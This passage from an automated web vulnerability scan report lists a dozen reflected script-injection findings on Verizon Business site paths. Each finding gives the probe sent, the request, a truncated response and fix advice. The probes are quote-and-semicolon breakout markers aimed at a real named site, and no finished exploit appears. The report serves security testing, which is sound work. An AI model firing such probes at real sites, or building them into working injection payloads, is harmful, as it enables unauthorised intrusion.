Host:   http://www.verizonbusiness.com
Path:   /thinkforward/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b151"%3b9c978325f14 was submitted in the REST URL parameter 1. This input was echoed as 6b151";9c978325f14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6b151"%3b9c978325f14/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
"; }
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/6b151";9c978325f14/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1109. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /topnav.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c26a"%3b50ea20905ac was submitted in the REST URL parameter 1. This input was echoed as 3c26a";50ea20905ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topnav.xml3c26a"%3b50ea20905ac?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:17 GMT
Vary: *
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:17 GMT
Connection: close
Set-Cookie: Lang=en; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:03:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/topnav.xml3c26a";50ea20905ac";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1110. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /topnav.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1059d'%3b3542eebd779 was submitted in the REST URL parameter 1. This input was echoed as 1059d';3542eebd779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topnav.xml1059d'%3b3542eebd779?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:29 GMT
Vary: *
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:29 GMT
Connection: close
Set-Cookie: Lang=en; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:03:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/topnav.xml1059d';3542eebd779'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1111. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /tw/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7f5d'%3b29238dbf312 was submitted in the REST URL parameter 1. This input was echoed as b7f5d';29238dbf312 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /twb7f5d'%3b29238dbf312/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Date: Wed, 17 Nov 2010 01:00:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/twb7f5d';29238dbf312/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1112. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /tw/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a831"%3bd765c5a4d5d was submitted in the REST URL parameter 1. This input was echoed as 3a831";d765c5a4d5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tw3a831"%3bd765c5a4d5d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/tw3a831";d765c5a4d5d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1113. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 273a8'%3bb5d548f241a was submitted in the REST URL parameter 1. This input was echoed as 273a8';b5d548f241a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk273a8'%3bb5d548f241a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/uk273a8';b5d548f241a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1114. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba54"%3b405db27b986 was submitted in the REST URL parameter 1. This input was echoed as 8ba54";405db27b986 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk8ba54"%3b405db27b986/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:00 GMT
Content-Type: text/html
Content-Length: 40615
Date: Wed, 17 Nov 2010 01:00:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk8ba54";405db27b986/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1115. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8578'%3b68d588f1527 was submitted in the REST URL parameter 1. This input was echoed as b8578';68d588f1527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ukb8578'%3b68d588f1527/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40643
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/ukb8578';68d588f1527/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1116. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949c6"%3bbe26c5ba2e7 was submitted in the REST URL parameter 1. This input was echoed as 949c6";be26c5ba2e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk949c6"%3bbe26c5ba2e7/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Date: Wed, 17 Nov 2010 01:00:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk949c6";be26c5ba2e7/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1117. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a5b"%3b307c3d2f00c was submitted in the REST URL parameter 2. This input was echoed as 13a5b";307c3d2f00c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions13a5b"%3b307c3d2f00c/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41174
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk/solutions13a5b";307c3d2f00c/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1118. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad43'%3b3a75ff4b38 was submitted in the REST URL parameter 2. This input was echoed as 1ad43';3a75ff4b38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions1ad43'%3b3a75ff4b38/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41170
Date: Wed, 17 Nov 2010 01:01:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/uk/solutions1ad43';3a75ff4b38/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1119. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 876a6"%3b542aff1d128 was submitted in the REST URL parameter 3. This input was echoed as 876a6";542aff1d128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions/var876a6"%3b542aff1d128/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42386
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk/solutions/var876a6";542aff1d128/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1120. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75025'%3ba91d526cf44 was submitted in the REST URL parameter 3. This input was echoed as 75025';a91d526cf44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions/var75025'%3ba91d526cf44/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42386
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
